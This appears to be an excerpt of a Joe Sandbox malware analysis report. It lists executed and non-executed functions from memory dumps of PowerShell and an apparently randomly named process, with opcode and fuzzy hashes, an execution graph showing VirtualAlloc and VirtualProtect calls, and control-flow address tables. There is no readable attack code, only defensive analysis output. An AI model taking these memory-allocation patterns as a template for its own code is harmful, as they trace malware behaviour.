                                                                                                  Function 00007FFD9BAC4073 Relevance: .2, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 007abf8e7f9fc2642cee350aedacafd1de3e38917613a9db1b074d3aa2398543
                                                                                                  • Instruction ID: ac29869658b0563f5c83222ff8b410658176352a9115b542f76c17c99f6345c8
                                                                                                  • Opcode Fuzzy Hash: 007abf8e7f9fc2642cee350aedacafd1de3e38917613a9db1b074d3aa2398543
                                                                                                  • Instruction Fuzzy Hash: 20512632B0EA8E0FE7A9AB6C446157477D2EFA4220B1A00BFC19EC71B7DE14EC058345
                                                                                                  Function 00007FFD9BAC4370 Relevance: .1, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bafe9d38de45dead31391d672c0fb39586947b75276171f985935b4c3a3b50d2
                                                                                                  • Instruction ID: 4d59c38e1fdf5104dcf80bb9b0b75de6579bc0c2db1c3352ba2da893301dd192
                                                                                                  • Opcode Fuzzy Hash: bafe9d38de45dead31391d672c0fb39586947b75276171f985935b4c3a3b50d2
                                                                                                  • Instruction Fuzzy Hash: F441F532B0EA8D0FE7B9E76854606B877D1EF84220B1A01FED45EC72A7EE15AD018345
                                                                                                  Function 00007FFD9B8DEE20 Relevance: .1, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2953930069.00007FFD9B8DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8DD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b8dd000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cae76aa6c1770c4feed6dcb408f16507d0a174564bda8701479e33a47f7a6758
                                                                                                  • Instruction ID: 909c0407f38644636fe59a42808244f6be174ae47d0735abe4cab84eee71d04e
                                                                                                  • Opcode Fuzzy Hash: cae76aa6c1770c4feed6dcb408f16507d0a174564bda8701479e33a47f7a6758
                                                                                                  • Instruction Fuzzy Hash: 4341367040EBC44FD7578B399855A523FF0EF57321B0A06EFD088CB5A3D629A846C7A2
                                                                                                  Function 00007FFD9B9F9797 Relevance: .1, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 59cfa342d8554e1323c86027cbabdae1dbe0d459a0610b05193a3fc2b39d3dd4
                                                                                                  • Instruction ID: bd41ec0a5c9249990a7e3bc63e14cb5ed3e4cf93315e69bb7724103ccd2b222c
                                                                                                  • Opcode Fuzzy Hash: 59cfa342d8554e1323c86027cbabdae1dbe0d459a0610b05193a3fc2b39d3dd4
                                                                                                  • Instruction Fuzzy Hash: 2831C831A1CB4C5FDB18EB5CA846AE97BE0FB59321F00422FE449D3252CB71A855CBC6
                                                                                                  Function 00007FFD9BAC40BF Relevance: .1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 71de891296f2632b51db950f1abc03021afccc06c2512999eca760ca4e182865
                                                                                                  • Instruction ID: 8b7eebda9cc87db6735d652ff9b667c8d8f2b0c3e647c85d3514f9742aeac80b
                                                                                                  • Opcode Fuzzy Hash: 71de891296f2632b51db950f1abc03021afccc06c2512999eca760ca4e182865
                                                                                                  • Instruction Fuzzy Hash: EF21C132B0EA8B0FE7B9EB5C446257467D2EF61220B5A10BED09EC71F2DE18ED048305
                                                                                                  Function 00007FFD9BAC43BC Relevance: .1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2968426549.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9bac0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09e5a665dc43f01e54cd100c53e14987d7431ae6240aebf7a4cec0bc9a711448
                                                                                                  • Instruction ID: 3b94cd12925a35f311227c319ca3f55daa527db903d5d2bbc15742e7ccf8320d
                                                                                                  • Opcode Fuzzy Hash: 09e5a665dc43f01e54cd100c53e14987d7431ae6240aebf7a4cec0bc9a711448
                                                                                                  • Instruction Fuzzy Hash: 3B11BF32A0E9890FE7B4E75894605B87AD1EF80220B5A00FED45DC72B6DD55AD008344
                                                                                                  Function 00007FFD9B9F33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                  • Instruction ID: 4dd6f5e87c23be5727fba137d59d1ad777011c451dbc05b8ab661a33166cf41a
                                                                                                  • Opcode Fuzzy Hash: 672cddce3b61fd07d14acf0d5ff0c6c5c9905a2842d53f114a6d1ab46604d338
                                                                                                  • Instruction Fuzzy Hash: B501677121CB0C4FD748EF0CE451AA5B7E0FB95364F50056DE58AC36A5DB36E882CB45
                                                                                                  Function 00007FFD9B9F9CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ce0bca794b0e483338a89cbbf4e62d33a9821968d6026cdcb8289f759f80a80f
                                                                                                  • Instruction ID: c630169e8ee464e73adae2b405ebde2e1267bbc3402618be6aa3f81b43e36195
                                                                                                  • Opcode Fuzzy Hash: ce0bca794b0e483338a89cbbf4e62d33a9821968d6026cdcb8289f759f80a80f
                                                                                                  • Instruction Fuzzy Hash: 24F0243181868D4FEB4AEF2888294D57FA0EF26320F15029BE448C70B2DB649958CB92

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FFD9B9F8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000018.00000002.2961401692.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_24_2_7ffd9b9f0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: N_^6$N_^<$N_^F$N_^I$N_^J
                                                                                                  • API String ID: 0-4116931533
                                                                                                  • Opcode ID: 96725cc96c0d45b83616c1728daf5a7ad218922735d25ec7bec5547ac2272062
                                                                                                  • Instruction ID: 5cd5b64cbfb0d6f9ee547f577b423769bb94c1642fd261d6b9219aae30a127de
                                                                                                  • Opcode Fuzzy Hash: 96725cc96c0d45b83616c1728daf5a7ad218922735d25ec7bec5547ac2272062
                                                                                                  • Instruction Fuzzy Hash: 462124777084265FE30677EDBCA09D87780DB9427674A01B3D369CF543D916688B87C1

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9BAF6605 Relevance: .4, Instructions: 448COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3dd3b43a33b319e67a3eca3a83bf658d66c586d68b7f8dce85fd4f5626e4c8af
                                                                                                  • Instruction ID: fc680a89315a4f4777e01a38b0dcae483903fa9fc086671dffcf00c84bee3110
                                                                                                  • Opcode Fuzzy Hash: 3dd3b43a33b319e67a3eca3a83bf658d66c586d68b7f8dce85fd4f5626e4c8af
                                                                                                  • Instruction Fuzzy Hash: 77D12532B0EB8E0FEBA59BAC48655B57FA1EF56310B0901FED49DCB0E3D958A805C341
                                                                                                  Function 00007FFD9BA2B71C Relevance: .3, Instructions: 288COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 20cdf1255ebba025503a311bd328a05d29c26b50f32893b01eb72b49f1614881
                                                                                                  • Instruction ID: 0d7169426eab7b6747c2957362130fd431afb578c95cece6cdded3d733032ebf
                                                                                                  • Opcode Fuzzy Hash: 20cdf1255ebba025503a311bd328a05d29c26b50f32893b01eb72b49f1614881
                                                                                                  • Instruction Fuzzy Hash: 1F81483160DB4C4FD799DB5CC895AB57BE0EF9A320F1401BED08EC71A3DA65A846CB41
                                                                                                  Function 00007FFD9BAF4073 Relevance: .2, Instructions: 184COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d1cd233dc249954ead2e4bacd988c57a51a483f1a3149f79cd14473ada063fa1
                                                                                                  • Instruction ID: 3184f5c59297ce8b7b729016c14680ea47804019f2f2b036a07bbf5641deba99
                                                                                                  • Opcode Fuzzy Hash: d1cd233dc249954ead2e4bacd988c57a51a483f1a3149f79cd14473ada063fa1
                                                                                                  • Instruction Fuzzy Hash: 90511632B0EB4A0FE7A99B5D44615B47BD2EF95210B1A00BFC15EC72B7DE18EC058345
                                                                                                  Function 00007FFD9BA29718 Relevance: .2, Instructions: 161COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f0e74aaa708007b74ed743ad0f5f76d8b02f9685a443d10569e9882ed46fe276
                                                                                                  • Instruction ID: b8a5df78e0ba0f693127a206c951b0d41926227c96a97e8d711d1205326f19c2
                                                                                                  • Opcode Fuzzy Hash: f0e74aaa708007b74ed743ad0f5f76d8b02f9685a443d10569e9882ed46fe276
                                                                                                  • Instruction Fuzzy Hash: F8416B71E0EA884FEB189F5C9C5A6A87FE0FB95710F14417FD09887293DA60AD05CBC2
                                                                                                  Function 00007FFD9BAF4370 Relevance: .1, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1bb29106f5863242a9b47e6013093d5f71cd209b2745fd256277f55a33840ce5
                                                                                                  • Instruction ID: 4f30fce4d1b5406d00a300bc323820a6ed82a4491178f33bf3ee3b173dd31671
                                                                                                  • Opcode Fuzzy Hash: 1bb29106f5863242a9b47e6013093d5f71cd209b2745fd256277f55a33840ce5
                                                                                                  • Instruction Fuzzy Hash: 4F41E332B0EB8D0FEBB9D76894605F47BD1EF84220B0A01BED45EC71A7EE15AD058341
                                                                                                  Function 00007FFD9B90ED40 Relevance: .1, Instructions: 126COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2850566585.00007FFD9B90D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B90D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9b90d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2e1af1eeecde9dbaf1a4ff7e1c5bc3e4ec6b3d4562762cbfd11b46092fea819b
                                                                                                  • Instruction ID: 219a390563db3ee3882d4598a8349022f68ab8c376359e531f512df29ee17c83
                                                                                                  • Opcode Fuzzy Hash: 2e1af1eeecde9dbaf1a4ff7e1c5bc3e4ec6b3d4562762cbfd11b46092fea819b
                                                                                                  • Instruction Fuzzy Hash: 2041287181EBC45FE7568B2898559523FF0EF53220B1A01DFD0C8CB1A3D629A846C7A2
                                                                                                  Function 00007FFD9BAF40BF Relevance: .1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f19ea3756c337a1a4d318b8e05116902134446db4a1c106d3e9a8e6ed893630d
                                                                                                  • Instruction ID: 2ea40b7b1c54013ba64707403fb69ffac9250286b9b4eeba3bad2d29ba0830c4
                                                                                                  • Opcode Fuzzy Hash: f19ea3756c337a1a4d318b8e05116902134446db4a1c106d3e9a8e6ed893630d
                                                                                                  • Instruction Fuzzy Hash: 4621BF22B0EB8B0FE7B99B5D45625B46AD2EF61210B5A00BED05EC71F2DE18ED058305
                                                                                                  Function 00007FFD9BAF43BC Relevance: .1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2866975716.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9baf0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf94f26bdb72b7c14cd534410e289c893f342c14a356a06b24575fedbb1463a2
                                                                                                  • Instruction ID: 0d0bae60dbe45156a03e57b31ffa75846d8cb4693969b34c719cd07d49eb3316
                                                                                                  • Opcode Fuzzy Hash: bf94f26bdb72b7c14cd534410e289c893f342c14a356a06b24575fedbb1463a2
                                                                                                  • Instruction Fuzzy Hash: AE11BC32B0FA8A0FE7B5DB6984605B87AD1EF40220B5A01BED46EC71B6DE59AD048341
                                                                                                  Function 00007FFD9BA233B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction ID: ef0cfff55408565f3f2370646d3c2087cfd556061bc4c6768bd386db64d07b43
                                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction Fuzzy Hash: B901A73020CB0C4FD748EF0CE051AA5B3E0FB85324F10056DE58AC36A5DB32E882CB41
                                                                                                  Function 00007FFD9BA29CF8 Relevance: .0, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001A.00000002.2858848769.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_26_2_7ffd9ba20000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f44e094252406662c1e7a8b3e7cfe3f9d35e282452c1b66e49475c2bc90d1bc2
                                                                                                  • Instruction ID: d44dba6762f8e6b16f5fbc3e01229f0d482b507801f98f081201fd5cfd5338be
                                                                                                  • Opcode Fuzzy Hash: f44e094252406662c1e7a8b3e7cfe3f9d35e282452c1b66e49475c2bc90d1bc2
                                                                                                  • Instruction Fuzzy Hash: 29F0243180868D4FDB06EF2888294D57FA0EF26310B0502ABE848C70B2DB649558CB82

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:4%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:6
                                                                                                  Total number of Limit Nodes:0
                                                                                                  execution_graph 14710 7ffd9ba221ce 14711 7ffd9ba221dd VirtualProtect 14710->14711 14713 7ffd9ba2231d 14711->14713 14714 7ffd9ba23bbd 14715 7ffd9ba23bdf VirtualAlloc 14714->14715 14717 7ffd9ba23cf5 14715->14717

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9BA2BA1D Relevance: 1.3, Instructions: 1291COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 36 7ffd9ba2ba1d-7ffd9ba2ba58 37 7ffd9ba2ba5f-7ffd9ba2babf 36->37 38 7ffd9ba2ba5a 36->38 42 7ffd9ba2bacd-7ffd9ba2badc 37->42 43 7ffd9ba2bac1 37->43 38->37 44 7ffd9ba2bade 42->44 45 7ffd9ba2bae3-7ffd9ba2baec 42->45 43->42 44->45 46 7ffd9ba2baee-7ffd9ba2bafd 45->46 47 7ffd9ba2bb19-7ffd9ba2bb74 45->47 48 7ffd9ba2baff 46->48 49 7ffd9ba2bb04-7ffd9ba2bb14 46->49 57 7ffd9ba2bb76 47->57 58 7ffd9ba2bb7b-7ffd9ba2bbdc 47->58 48->49 51 7ffd9ba2d47d-7ffd9ba2d559 call 7ffd9ba2e6a6 49->51 70 7ffd9ba2d55f-7ffd9ba2d65d 51->70 71 7ffd9ba2d666-7ffd9ba2d6be 51->71 57->58 58->51 70->71 109 7ffd9ba2d65f 70->109 78 7ffd9ba2d6c4-7ffd9ba2d70f 71->78 79 7ffd9ba2d855-7ffd9ba2d931 71->79 89 7ffd9ba2d83c-7ffd9ba2d849 78->89 116 7ffd9ba2da12-7ffd9ba2da65 79->116 117 7ffd9ba2d937-7ffd9ba2d940 79->117 90 7ffd9ba2d84f-7ffd9ba2d850 89->90 91 7ffd9ba2d714-7ffd9ba2d722 89->91 96 7ffd9ba2dc0d-7ffd9ba2dc6c 90->96 94 7ffd9ba2d724 91->94 95 7ffd9ba2d729-7ffd9ba2d7a9 91->95 94->95 111 7ffd9ba2d7b0-7ffd9ba2d82a 95->111 112 7ffd9ba2d7ab 95->112 110 7ffd9ba2df34-7ffd9ba2df61 96->110 109->71 119 7ffd9ba2dc71-7ffd9ba2dcad 110->119 120 7ffd9ba2df67-7ffd9ba2df8b call 7ffd9ba2e709 110->120 142 7ffd9ba2d834-7ffd9ba2d839 111->142 143 7ffd9ba2d82c-7ffd9ba2d831 111->143 112->111 134 7ffd9ba2dbfa-7ffd9ba2dc07 116->134 117->116 128 7ffd9ba2dcaf-7ffd9ba2dcc6 119->128 129 7ffd9ba2dcca-7ffd9ba2df31 119->129 138 7ffd9ba2df8d 120->138 139 7ffd9ba2df94-7ffd9ba2dfc8 120->139 128->129 129->110 134->96 136 7ffd9ba2da6a-7ffd9ba2da78 134->136 140 7ffd9ba2da7f-7ffd9ba2db1f 136->140 141 7ffd9ba2da7a 136->141 138->139 146 7ffd9ba2dfe8-7ffd9ba2dffe 139->146 147 7ffd9ba2dfca-7ffd9ba2dfd7 139->147 177 7ffd9ba2db8f-7ffd9ba2dbb7 140->177 178 7ffd9ba2db21-7ffd9ba2db49 140->178 141->140 142->89 143->142 151 7ffd9ba2e000-7ffd9ba2e005 146->151 152 7ffd9ba2e05c 146->152 149 7ffd9ba2dfde-7ffd9ba2dfe6 147->149 150 7ffd9ba2dfd9 147->150 149->146 150->149 154 7ffd9ba2e1c4-7ffd9ba2e1c8 151->154 155 7ffd9ba2e00b-7ffd9ba2e021 151->155 157 7ffd9ba2e07f-7ffd9ba2e109 152->157 159 7ffd9ba2e1ce-7ffd9ba2e1d7 154->159 160 7ffd9ba2e4d7-7ffd9ba2e52f 154->160 155->157 157->154 197 7ffd9ba2e10f-7ffd9ba2e11b 157->197 164 7ffd9ba2e1e1-7ffd9ba2e1ea 159->164 165 7ffd9ba2e1d9-7ffd9ba2e1de 159->165 179 7ffd9ba2e697-7ffd9ba2e6a5 160->179 180 7ffd9ba2e535-7ffd9ba2e5ca 160->180 166 7ffd9ba2e4c1-7ffd9ba2e4d1 164->166 165->164 166->160 168 7ffd9ba2e1ef-7ffd9ba2e200 166->168 171 7ffd9ba2e202 168->171 172 7ffd9ba2e207-7ffd9ba2e2a7 168->172 171->172 206 7ffd9ba2e2ad-7ffd9ba2e30d 172->206 207 7ffd9ba2e4b3-7ffd9ba2e4bb 172->207 185 7ffd9ba2dbbe-7ffd9ba2dbe7 177->185 186 7ffd9ba2dbb9 177->186 182 7ffd9ba2db50-7ffd9ba2db8d 178->182 183 7ffd9ba2db4b 178->183 180->179 210 7ffd9ba2e5d0-7ffd9ba2e5e1 180->210 196 7ffd9ba2dbf2-7ffd9ba2dbf7 182->196 183->182 185->196 186->185 196->134 197->154 200 7ffd9ba2e121-7ffd9ba2e1b9 197->200 200->154 218 7ffd9ba2e30f 206->218 219 7ffd9ba2e314-7ffd9ba2e31d 206->219 207->166 213 7ffd9ba2e5e3 210->213 214 7ffd9ba2e5e8-7ffd9ba2e695 210->214 213->214 214->179 218->219 221 7ffd9ba2e323-7ffd9ba2e37b 219->221 222 7ffd9ba2e48c-7ffd9ba2e49a 219->222 232 7ffd9ba2e381-7ffd9ba2e3ad 221->232 233 7ffd9ba2e407-7ffd9ba2e435 221->233 225 7ffd9ba2e4a1-7ffd9ba2e4a9 222->225 226 7ffd9ba2e49c 222->226 227 7ffd9ba2e4ab-7ffd9ba2e4b0 225->227 226->225 227->207 236 7ffd9ba2e3af 232->236 237 7ffd9ba2e3b4-7ffd9ba2e402 232->237 234 7ffd9ba2e437 233->234 235 7ffd9ba2e43c-7ffd9ba2e48a 233->235 234->235 235->227 236->237 237->227
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.3017140408.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_7ffd9ba2b000_uAsLgsGzSk.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7d98b0bb54cabcc76f10b08c584a1e87e5f4f8b131f1b35175ace9b79dcdb164
                                                                                                  • Instruction ID: 1f9ee8072fcfa11aad20f62902c0b0272b6f007602f1dda02925ae78591ee211
                                                                                                  • Opcode Fuzzy Hash: 7d98b0bb54cabcc76f10b08c584a1e87e5f4f8b131f1b35175ace9b79dcdb164
                                                                                                  • Instruction Fuzzy Hash: BCB2F070A4991D8FDBA8EF58C8A5BA9B7B1FF58300F1441E9D04DD3296CA75AE81CF40
                                                                                                  Function 00007FFD9BA59A40 Relevance: .5, Instructions: 451COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 388 7ffd9ba59a40 389 7ffd9ba59a45-7ffd9ba59a8e 388->389 390 7ffd9ba59a90-7ffd9ba59a95 389->390 391 7ffd9ba59a98-7ffd9ba59aa1 389->391 390->391 392 7ffd9ba59f2f-7ffd9ba59f35 391->392 393 7ffd9ba59f3b-7ffd9ba59f54 392->393 394 7ffd9ba59aa6-7ffd9ba59ad0 392->394 395 7ffd9ba59ad2 394->395 396 7ffd9ba59ad7-7ffd9ba59af0 394->396 395->396 398 7ffd9ba59af2 396->398 399 7ffd9ba59af7-7ffd9ba59b11 396->399 398->399 400 7ffd9ba59b13 399->400 401 7ffd9ba59b18-7ffd9ba59b30 399->401 400->401 402 7ffd9ba59b32 401->402 403 7ffd9ba59b37-7ffd9ba59b58 401->403 402->403 404 7ffd9ba59b5a-7ffd9ba59b5e 403->404 405 7ffd9ba59bc6-7ffd9ba59be3 403->405 404->405 408 7ffd9ba59b60-7ffd9ba59b74 404->408 406 7ffd9ba59bea-7ffd9ba59c03 405->406 407 7ffd9ba59be5 405->407 409 7ffd9ba59c0a-7ffd9ba59c24 406->409 410 7ffd9ba59c05 406->410 407->406 411 7ffd9ba59bb8-7ffd9ba59bbe 408->411 414 7ffd9ba59c2b-7ffd9ba59c43 409->414 415 7ffd9ba59c26 409->415 410->409 412 7ffd9ba59bc0-7ffd9ba59bc1 411->412 413 7ffd9ba59b76-7ffd9ba59b7a 411->413 416 7ffd9ba59c57-7ffd9ba59c8e 412->416 417 7ffd9ba59b7c-7ffd9ba59b82 413->417 418 7ffd9ba59b85-7ffd9ba59b9b 413->418 419 7ffd9ba59c4a-7ffd9ba59c54 414->419 420 7ffd9ba59c45 414->420 415->414 423 7ffd9ba59c90-7ffd9ba59c95 416->423 424 7ffd9ba59c98-7ffd9ba59cc1 416->424 417->418 421 7ffd9ba59ba2-7ffd9ba59bb5 418->421 422 7ffd9ba59b9d 418->422 419->416 420->419 421->411 422->421 423->424 425 7ffd9ba59cc3-7ffd9ba59cc8 424->425 426 7ffd9ba59ccb-7ffd9ba59df1 424->426 425->426 427 7ffd9ba59df3-7ffd9ba59e0c 426->427 428 7ffd9ba59e4a-7ffd9ba59e4e 426->428 429 7ffd9ba59e0e-7ffd9ba59e12 427->429 430 7ffd9ba59e7f-7ffd9ba59e96 427->430 431 7ffd9ba59e50 428->431 432 7ffd9ba59e55-7ffd9ba59e6e 428->432 429->430 435 7ffd9ba59e14-7ffd9ba59e23 429->435 433 7ffd9ba59e9d-7ffd9ba59eb7 430->433 434 7ffd9ba59e98 